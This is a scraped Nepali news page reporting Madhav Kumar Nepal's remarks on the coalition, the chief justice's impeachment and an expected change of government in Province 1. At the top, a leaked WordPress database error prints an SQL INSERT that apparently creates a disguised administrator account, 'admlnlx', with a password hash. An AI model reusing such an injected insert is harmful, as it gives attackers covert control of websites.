WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGK3CWFiwDhrQ6SwrrOcc/3rmOJDJI0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:31:19', '', 'admlnlx', 'admlnlx')

काँचो धागोले बाँधेको गठबन्धन होइन– अध्यक्ष नेपाल – Gaule Khabar

काँचो धागोले बाँधेको गठबन्धन होइन– अध्यक्ष नेपाल

काँचो धागोले बाँधेको गठबन्धन होइन– अध्यक्ष नेपाल

नेकपा (एकीकृत समाजवादी) पार्टिका अध्यक्ष एवं पूर्वप्रधानमन्त्री माधवकुमार नेपालले वर्तमान गठबन्धन काँचो धागोले बाँधेको नभएकाले गठबन्धन मजबुत भउको बताए ।

विराटनगर विमानस्थलमा आज बिहान सञ्चारकर्मीसँग संक्षिप्त कुराकानीको क्रममा उहाँले प्रधानन्यायाधीश चोलेन्द्रशम्शेर जबरालाई महाअभियोग लगाउने विषयमा कुनै छलफल नभएको बताए । नेपालले प्रदेश नं १ मा छिट्टै मुख्यमन्त्री भीम आचार्यको बहिगर्मन हुने पनि बताए । प्रदेश नं १ का नेकपा एकीकृत समाजवादी पार्टीका संसदीय दलका नेता राजेन्द्रकुमार राईको नेतृत्वमा सरकार बन्ने भनाइ राख्दै उहाँले अघिल्लो सरकारले सङ्घीयता, राष्ट्रियता र लोकतन्त्रलाई कमजोर बनाउने काम गरेको आरोप लगाए । उहाँले आफ्नो पार्टीमा मेचीदेखि महाकालीसम्म जनलहर भएको बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका